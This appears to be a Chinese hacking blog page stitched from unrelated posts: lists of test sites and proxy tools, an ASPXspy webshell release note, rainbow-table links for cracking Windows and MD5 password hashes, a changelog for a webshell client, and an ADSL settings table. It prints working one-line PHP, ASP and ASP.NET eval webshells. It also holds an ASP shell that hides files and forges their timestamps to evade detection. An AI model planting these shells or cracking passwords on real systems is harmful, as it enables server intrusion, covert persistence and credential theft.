本周在拉斯韦加斯的黑帽黑客大会上,微软计划针对去年首度公布的安全计划,提供进度报告,并提供新的安全工具及相关信息以支持客户及合作伙伴。微软推出Microsoft Office Visualization Tool,可提供Office二进制文件格式的图形化视图。这个软件可协助IT和安全人员更了解针对Office文件的攻击行为。
SPI Dynamics (live) – http://zero.webappsecurity.com/
Cenzic (live) – http://crackme.cenzic.com/
Watchfire (live) – http://demo.testfire.net/
Acunetix (live) – http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
WebMaven / Buggy Bank – http://www.mavensecurity.com/webmaven
Foundstone SASS tools – http://www.foundstone.com/us/resources-free-tools.asp
Updated HackmeBank – http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
OWASP WebGoat – http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP SiteGenerator – http://www.owasp.org/index.php/Owasp_SiteGenerator
Stanford SecuriBench – http://suif.stanford.edu/~livshits/securibench/
SecuriBench Micro – http://suif.stanford.edu/~livshits/work/securibench-micro/
WebScarab – http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
Burp – http://www.portswigger.net/
Paros – http://www.parosproxy.org/
Fiddler – http://www.fiddlertool.com/
Web Proxy Editor – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
Pantera – http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project
Suru – http://www.sensepost.com/research/suru/
httpedit (curses-based) – http://www.neutralbit.com/en/rd/httpedit/
Charles – http://www.xk72.com/charles/
Odysseus – http://www.bindshell.net/tools/odysseus
Burp, Paros, and WebScarab for Mac OS X – http://www.corsaire.com/downloads/
Web-application scanning tool from `Network Security Tools’/O’Reilly – http://examples.oreilly.com/networkst/
JS Commander – http://jscmd.rubyforge.org/
Ratproxy – http://code.google.com/p/ratproxy/
这个版本比较大的改动就是支持.rtc格式了,体积可以减小50% 到 56.25%
[July 22, 2009]RainbowCrack 1.4 is released
This version focus on more effective rainbow table file format. New features:
Smaller rainbow table significantly improve table lookup performance!
作者:Bin
1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。
2.密码为32位MD5加密(小写) 默认为 admin.
3.全部采用POST方式提交数据,增强了隐蔽性。
4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。
5.增加了对指定文件的搜索功能。
6.修正了一些数据库操作的BUG。
7.增强了对注册表的读取,此部分由BloodSword完成,在此感谢。
8.修正了对端口的多线程扫描
9.增强了端口转发功能,参考了Cnqing的一些代码,在此感谢。
免责声明:此工具为安全检测工具,任何人使用此工具,做违法国家法律的事情,责任自负!
联系方式:E-mail:master@rootkit.net.cn Blog:www.rootkit.net.cn
下载地址:ASPXspy2.rar
PS:最近在搞彩虹表
上次那个只能到92%,现在修复了可以下载100%
彩虹表 详细介绍(来源赛迪网):
http://tech.ccidnet.com/art/237/20070913/1211093_1.html
彩虹表的使用教程:
http://www.3800hk.com/donghua/f/25542.html
彩虹表 官方下载地址:
http://ophcrack.sourceforge.net/
大家需要做的就是下载下面两个东西
1、ophcrack All platforms
2、ophcrack LiveCDNo installation
第一个是XP平台上运行的软件 ophcrack-win32-installer-3.0.1.exe
第二个是LiveCD,你可以用这张CD引导系统,在Linux环境下自动识别windows系统并且破解登陆密码 ophcrack-xp-livecd-2.0.1.iso
>> 关于彩虹表的使用
[RainbowCrack + LM Tables 破解SAM密码]
http://www.t00ls.net/viewthread.php?tid=505
[SAMInside + LM Tables 破解SAM密码完美组合]
http://www.t00ls.net/viewthread.php?tid=503
最小彩虹表是最基本的字母数字表,就这样它的大小就有388MB。这是Ophcrack启动盘默认的表,很多人的收集便有了传说中的120G的彩虹表。
120G彩虹表HTTP下载
http://www.t00ls.net/viewthread.php?tid=474
下载地址1 Http://hash.0x54.com 铁通
下载地址2 Http://hash2.0x54.com 电信
备用地址1 Http://hash.t00ls.net 铁通
备用地址2 Http://hash2.t00ls.net 电信
点击下载此文件
原文网址:http://www.upx8.com/article.asp?id=271
http://www.upx8.com/article.asp?id=271
地址是国外的,很好很强大,需要的硬盘也很大, ~!
md5,sha1,lm-hash,nt-hash都在里面。
ciscopix_mixalpha-numeric-all-space_1-6
halflmchall_alpha-numeric_1-7
lm_all_1-7
lm_alpha-numeric_1-7
lm_alpha_1-7
lm_alpha_numeric_1-7
md5_loweralpha-numeric_1-8
md5_loweralpha-space_1-9
md5_mixalpha-numeric-all-space_1-6
md5_mixalpha-numeric-space_1-7
md5_numeric_1-12
mscache_mixalpha-numeric-all-space_1-6
ntlm_loweralpha-numeric-space_1-8
ntlm_loweralpha-space_1-9
ntlm_loweralpha_1-9
ntlm_mixalpha-numeric-all-space_1-6_perfect
下载地址:http://rainbowtables.ddl.cx/
lm_all-space#1-7
lm_alpha-numeric#1-7
md5_alpha-numeric-space#1-8
md5_alpha-space#1-9
md5_hybrid(loweralpha#6-6,numeric#1-3)
md5_hybrid(loweralpha#7-7,numeric#1-3)
md5_loweralpha-numeric-space#1-8
md5_loweralpha-numeric-symbol32-space#1-7
md5_loweralpha-space#1-9
md5_mixalpha-numeric-all-space#1-6
md5_mixalpha-numeric-space#1-7
md5_numeric#1-12
ntlm_alpha-numeric-space#1-8
ntlm_alpha-space#1-9
ntlm_hybrid(loweralpha#6-6,numeric#1-3)
ntlm_loweralpha-numeric-space#1-8
ntlm_loweralpha-numeric-symbol32-space#1-7
ntlm_loweralpha-space#1-9
ntlm_mixalpha-numeric-all-space#1-6
ntlm_mixalpha-numeric-space#1-7
ntlm_numeric#1-12
fastlm_alpha-numeric#1-7
halflmchall_alpha-numeric#1-7
sha1_loweralpha-numeric-space#1-8
sha1_loweralpha-space#1-9
sha1_mixalpha-numeric#1-7
sha1_numeric#1-12
下载地址:http://tbhost.eu/rt.php
欢迎测试,并给作者发布测试报告-------------
下载地址:http://www.gxgl.com/?did=2
------------------更新历史----------------------------
2009-6-22
PHP脚本中加了MYSQL操作功能,数据库结构以树型显示。
同时,配置列开始使用,并更新了数据库的表结构,测试时请重新输入数据。
2009-6-20
更新了虚拟终端中的一个小BUG
2009-6-19
修正了虚拟终端中WINDOWS系统目录切换的一个小BUG,非WINDOWS系统目录输入的一个BUG。
修正了编码切换的一些BUG
加入检查更新功能。
2009-6-18
实现虚拟终端,熟悉的操作方式。
错误提示等信息也一样可以显示,这是一个改进。
虚拟终端中加入终端基本信息获取,判断系统类型,当前目录,并动态改变命令提示
虚拟终端中加入模拟本地终端CD切换目录功能
2009-6-17
开始设计虚拟终端的界面。
2009-6-14
加入WGET功能。
左侧栏外观改动。
2009-6-13
修复删除目录后树型列表中目录未删除的BUG
优化数据编码算法,使处理速度明显提高。
添加新建目录功能
2009-6-12
加入复制粘贴功能。
2009-6-11
添加了ASP.NET的EVAL客户端目录浏览,文件显示,编辑,删除,下载,上传功能。
2009-6-9
添加配置文件,数据库新增一个配置表。
解决IIS6下不能下载大于4M文件的限制
进程互斥。
上传下载显示连接速度
修正了标签栏的一些切换错误,并使操作上更人性化了一些。
2009-6-8
添加了PHP的上传功能,转成文本再上传,到服务器再合成文件。
对日文网站在浏览目录时路径的进行特殊处理。
添加了ASP的上传功能,解决了不能上传超过200K文件的限制。
2009-6-6
调整中……
添加入下载功能,修正了以往下载的一些错误。
2009-6-5
修改了UTF8切换的一些乱码问题。
2009-6-3
标签栏颜色修改。
注意:每个地址添加编辑时要求选择正确的脚本类型和编码
完善文件保存/删除/目录删除。
增加了一些错误提示
增加了编码切换功能。
---------------------------------------------------------
服务端代码:
PHP:
<?php @eval($_POST['pass']);?>
ASP:
<%eval request("pass")%>
ASP.NET(注意要单独一个文件或此文件也是Jscript语言):
<%@ Page Language="Jscript"%><%eval(Request.Item["c"],"unsafe");%>
--------------------------------------------------------
支持HTTPS访问(对于需要独立证书的网站不支持。)
目录浏览加入了缓存。
支持俄,韩,日,繁,越南,泰,UTF-8等编码显示输入。
EVAL客户端将只是菜刀的一个功能,其它功能会陆续加入。
PS:留着以后有用
VPI(Virtual Path identifier,虚路径标识符)和VCI(Virtual ChannelIdentifier,虚通道标识符)是ADSL Modem识别各ATM终端的标志,各地可能不同,具体数值请向当地ISP询问。它们是开通adsl路由的最重要参数。
VPI和VCI是ATM传输的名词,ATM把一条物理电路划分为几个虚拟的逻辑通路,称为VPI;然后在每一个VPI中再划分虚拟的信道(Channel),称为VCI。
地点 电信VPI/VCI 网通VPI/VCI 铁通VPI/VCI DNS
黑龙江-哈尔滨 VPI/VCI:8/35 VPI/VCI:0/35 DNS:
佳木斯 VPI/VCI:0/35 VPI/VCI:8/35 DNS:
齐齐哈尔市 VPI/VCI:0/35 DNS:
绥化市 VPI/VCI:0/35 DNS:
鸡西市 VPI/VCI:0/35 DNS:
肇东市 VPI/VCI:0/35 DNS:
大庆 VPI/VCI:0/35 DNS:
吉林-吉林 VPI/VCI:0/38 DNS:202.98.0.68
长春 VPI/VCI:8/35 VPI/VCI:8/35
辽宁-沈阳 VPI/VCI:0/35 VPI/VCI:8/35 DNS:202.96.64.68
抚顺 VPI/VCI:8/32 DNS:210.52.149.2
锦州 VPI/VCI:8/81 DNS:
葫芦岛 VPI/VCI:8/81 DNS:
营口 VPI/VCI:8/81 DNS:
大连 VPI/VCI:8/35 DNS:202.96.69.38
浙江-杭州 VPI/VCI:8/35 VPI/VCI:8/35 DNS:202.101.172.35
宁波 VPI/VCI:8/35 VPI/VCI:8/35 DNS:202.96.104.15
台州 VPI/VCI:8/81 DNS:202.101.172.37
衢州 VPI/VCI:8/81 DNS:202.101.172.35
温州 VPI/VCI:8/35 DNS:202.96.104.16
嘉善 VPI/VCI:8/35 DNS:202.101.172.36
嘉兴 VPI/VCI:8/35 DNS:202.101.172.36
丽水 VPI/VCI:8/81 DNS:202.101.172.37
绍兴 VPI/VCI:8/81 DNS:202.96.104.18
北京-北京 VPI/VCI:0/35 VPI/VCI:8/35 DNS:202.106.196.152
广东-梅州 VPI/VCI:8/35 DNS:202.96.128.143
阳江 VPI/VCI:8/35 DNS:
肇庆网通 VPI/VCI:0/40 DNS:
揭阳 VPI/VCI:8/81 DNS:
福清 VPI/VCI:0/200 DNS:
汕头 VPI/VCI:0/35 DNS:
惠州 VPI/VCI:0/100 DNS:202.96.134.133
南海 VPI/VCI:0/100 DNS:202.96.128.68
中山 VPI/VCI:0/100 VPI/VCI:8/81 DNS:202.96.128.68
佛山 VPI/VCI:8/35 DNS:202.96.128.68
白云、海珠区 VPI/VCI:0/35 DNS:61.144.56.101
江门 VPI/VCI:0/100 DNS:202.96.128.68
河源 VPI/VCI:8/81 DNS:
珠海 VPI/VCI:8/35 DNS:
清远 VPI/VCI:8/81 DNS:
茂名 VPI/VCI:8/35 DNS:
顺德 VPI/VCI:8/81 DNS:
云浮 VPI/VCI:0/35 DNS:
斗门 VPI/VCI:0/100 DNS:
增城 VPI/VCI:0/35 DNS:
东莞 VPI/VCI:8/35 DNS:
惠东 VPI/VCI:0/100 DNS:
深圳 VPI/VCI:0/35 DNS:202.96.134.133
汕尾 VPI/VCI:0/35 DNS:
从化 VPI/VCI:8/35 DNS:202.96.128.68
花都 VPI/VCI:8/35 DNS:
肇庆 VPI/VCI:8/81 DNS:202.96.128.68
湛江 VPI/VCI:0/80 DNS:
广州 VPI/VCI:8/35 DNS:61.144.56.100
重庆-重庆 VPI/VCI:8/35 VPI/VCI:0/35 DNS:
万州 VPI/VCI:0/32
福建-福州 VPI/VCI:0/200 DNS:202.101.98.55
厦门 VPI/VCI:8/35 DNS:202.101.107.55
漳州 VPI/VCI:0/35 DNS:202.101.113.55
龙岩 VPI/VCI:0/35 DNS:202.101.113.55
南平 VPI/VCI:0/35 DNS:202.101.115.55
泉州 VPI/VCI:8/35 DNS:202.101.107.55
莆田 VPI/VCI:0/67 DNS:202.101.98.55
永定 VPI/VCI:0/35 DNS:202.101.98.55
三明 VPI/VCI:0/100 DNS:202.101.114.55
福清 VPI/VCI:0/35 DNS:202.101.107.55
上海-莆东 VPI/VCI:0/32 DNS:202.96.209.6
上海-嘉定 VPI/VCI:0/35 DNS:202.96.209.6
上海 VPI/VCI:8/81 DNS:202.96.209.6
天津-天津 VPI/VCI:0/35 VPI/VCI:0/35 DNS:202.99.96.68
新疆-乌鲁木齐 VPI/VCI:0/32 VPI/VCI:0/32 VPI/VCI:8/35 DNS:61.128.99.133
山东-菏泽 VPI/VCI:0/40 DNS:202.102.137.68
淄博 VPI/VCI:8/81 DNS:202.102.137.68
德州 VPI/VCI:8/81 DNS:202.102.152.3
威海 VPI/VCI:0/32 DNS:202.102.152.3
滨州 VPI/VCI:0/40 DNS:
枣庄 VPI/VCI:8/81 VPI/VCI:8/31 DNS:
临沂 VPI/VCI:8/31 DNS:
高密 VPI/VCI:8/81 DNS:
济宁 VPI/VCI:8/81 DNS:
潍坊 VPI/VCI:8/81 DNS:
昌邑 VPI/VCI:8/81 DNS:
青岛 VPI/VCI:8/35 DNS:
青岛城阳 VPI/VCI:0/33 DNS:
青岛李沧 VPI/VCI:0/33 DNS:
冠县 VPI/VCI:0/40 DNS:
东营 VPI/VCI:8/88 DNS:
江西-南昌 VPI/VCI:0/35 DNS:
樟州 VPI/VCI:0/35 DNS:
赣州 VPI/VCI:0/35 DNS:218.87.132.1
宜春 VPI/VCI:0/35 DNS:
萍乡 VPI/VCI:0/35 DNS:
内蒙古-赤峰 VPI/VCI:8/35 DNS:202.99.224.68
呼伦贝尔 VPI/VCI:8/35 DNS:
通辽 VPI/VCI:8/81 DNS:
西藏-拉萨 VPI/VCI:8/81 DNS:219.151.32.66
陕西-咸阳 VPI/VCI:8/81 DNS:
西安 VPI/VCI:8/35 DNS:
宝鸡 VPI/VCI:0/35 DNS:
榆林 VPI/VCI:0/35 DNS:
湖南-长沙 VPI/VCI:0/35 DNS:202.103.96.68
娄底 VPI/VCI:8/81 DNS:202.103.88.3
株洲 VPI/VCI:8/81 DNS:202.103.100.100
岳阳 VPI/VCI:8/81 DNS:
郴州 VPI/VCI:0/35 DNS:
吉首 VPI/VCI:0/35
张家界 VPI/VCI:0/35
桃江 VPI/VCI:8/81 DNS:202.103.8.81
衡阳 VPI/VCI:0/35 DNS:202.103.102.3
湖北-武汉 VPI/VCI:0/32 DNS:202.103.24.68
三峡 VPI/VCI:0/33
襄樊 VPI/VCI:0/35 DNS:202.103.44.5
荆门京山县 VPI/VCI:8/81
武昌 VPI/VCI:0/30
荆州 VPI/VCI:0/33
宜昌 VPI/VCI:0/35
黄冈 VPI/VCI:8/81
十堰 VPI/VCI:0/35
四川-成都 VPI/VCI:1/31 DNS:202.98.96.68
绵阳 VPI/VCI:0/32 DNS:202.97.7.17
自贡 VPI/VCI:0/35 DNS:61.139.2.69
乐山 VPI/VCI:0/35
雅安 VPI/VCI:8/81
阿坝洲 VPI/VCI:8/35
攀枝花 VPI/VCI:8/35
南充 VPI/VCI:0/35
内江 VPI/VCI:8/35
宜宾 VPI/VCI:0/35
资阳 VPI/VCI:8/35
江苏-南京 VPI/VCI:8/35 DNS:202.102.24.35
苏州 VPI/VCI:8/35 DNS:202.102.14.141
南通 VPI/VCI:0/100 DNS:61.147.7.1
镇江 VPI/VCI:8/35 DNS:202.102.4.41
无锡 VPI/VCI:0/100 DNS:202.102.2.141
常州 VPI/VCI:8/35 DNS:202.102.3.141
淮安 VPI/VCI:8/35 DNS:202.102.10.141
徐州 VPI/VCI:8/35 VPI/VCI:0/35
江阴 VPI/VCI:0/100
常熟 VPI/VCI:0/32
盐城 VPI/VCI:0/100
宿迁 VPI/VCI:8/35
特区-香港 DNS:205.252.144.228
澳门 DNS:202.175.3.8
台湾
安徽-合肥 VPI/VCI:0/35 DNS:202.102.192.68
安庆 VPI/VCI:8/35 DNS:202.12.201.132
宣城 VPI/VCI:8/35
蚌埠 VPI/VCI:8/81
广西-河池 VPI/VCI:0/35
南宁 VPI/VCI:0/35 DNS:202.103.225.68
柳州 VPI/VCI:0/35 DNS:202.103.225.68
梧州 VPI/VCI:0/35 DNS:202.103.224.68
玉林 VPI/VCI:0/35 DNS:202.102.224.68
河北-石家庄 VPI/VCI:0/35 DNS:202.99.160.99
秦皇岛 VPI/VCI:0/35 DNS:202.99.160.99
沧州 VPI/VCI:0/35
保定 VPI/VCI:0/100
唐山 VPI/VCI:0/35
邢台 VPI/VCI:8/81
河南-安阳 VPI/VCI:8/81 VPI/VCI:0/35 DNS:202.102.224.68
濮阳 VPI/VCI:0/35 VPI/VCI:0/35 DNS:202.102.224.68
驻马店 VPI/VCI:0/35 VPI/VCI:0/35 DNS:202.102.224.68
中原油田 VPI/VCI:8/81 VPI/VCI:0/35
焦作 VPI/VCI:0/35 VPI/VCI:0/35 202.102.227.68
宁夏-银川 VPI/VCI:8/35 DNS:202.100.128.68
山西-大同 VPI/VCI:0/32
运城 VPI/VCI:0/32
吕梁 VPI/VCI:8/81
青海-西宁 VPI/VCI:0/35 DNS:202.100.128.68
甘肃-兰州 VPI/VCI:0/32
天水 VPI/VCI:0/32
张掖 VPI/VCI:0/32
云南-昆明 VPI/VCI:0/35 VPI/VCI:0/32 DNS:202.98.160.68
普洱 VPI/VCI:0/35 DNS:61.166.150.101
海南-海口 VPI/VCI:0/35
贵州-贵阳 VPI/VCI:0/35
六盘水 VPI/VCI:0/35 DNS:202.98.198.168
遵义 VPI/VCI:0/35
<%
'隐藏并修改文件的最后修改时间的aspshell
'原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件
' 通过shell.application可以给文件重新设置一个最后修改时间
'2009/02/24 write by skyfire
response.write "<form method=post>"
response.write "路 径:<input name=path value='"&server.mappath("/")&"' size='30'>(一定要以\结尾)<br />"
response.write "文件名称:<input name=filename value='test.txt' size='30'><br />"
response.write "修改时间:<input name=time value='12/30/2099 12:30:30' size='30'><br />"
response.write "<input type=submit value=修改并隐藏文件>"
response.write "</form>"
'获取提交的参数
set path=request.Form("path")
set fileName=request.Form("filename")
set newTime=request.Form("time")
if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
'通过fso设置文件属性
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set file=fso.getFile(path&fileName)
file.attributes=2+4 '设置文件属性为隐藏+系统
'通过shell.Application修改文件的最后修改时间
Set shell=Server.CreateObject("Shell.Application")
Set app_path=shell.NameSpace(server.mappath("."))
Set app_file=app_path.ParseName(fileName)
app_file.Modifydate=newTime
end if
%>
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
近期评论